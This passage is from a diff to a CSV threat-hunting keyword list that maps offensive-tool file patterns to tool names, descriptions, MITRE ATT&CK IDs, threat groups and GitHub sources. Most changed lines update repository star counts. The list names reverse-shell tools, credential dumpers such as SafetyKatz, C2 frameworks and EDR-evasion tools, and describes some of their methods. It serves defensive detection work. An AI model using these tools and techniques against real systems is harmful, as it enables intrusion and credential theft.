T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/runshellcode.*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/RuralBishop.git*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","1","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*/rusers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rustcat/releases/latest/download/*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*/rusthound.exe*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" "*/RustHound.git*","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","1","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" -"*/rvrsh3ll/*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/rvrsh3ll/*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*/RWXfinder.git*","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","5","1","89","12","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z" "*/S3cur3Th1sSh1t/*","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","84","15","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" -"*/S3Scanner.git*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" -"*/S4UTomato.git*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*/S3Scanner.git*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*/S4UTomato.git*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*/s7-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/saefko.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/Safer_PoC_CVE*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" "*/SafetyKatz.git*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" -"*/sam_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/sam_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/samba-vuln-cve-2012-1182.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/samdump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" -"*/samruser.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*/sap_default.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/samruser.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/sap_default.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/sc_inject/inject/*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" -"*/scan4all.git*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/scan4all/lib/api*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/scan4all/lib/util*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/scanner/discovery*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/kerberos*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/pcanywhere*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/portscan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/scanner/winrm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/scan4all.git*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/api*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scan4all/lib/util*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/scanner/discovery*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/kerberos*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/pcanywhere*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/portscan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/scanner/winrm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" -"*/Scans/servers_all_smb*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/scan-network.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Scans/servers_all_smb*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/ScareCrow -I *","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 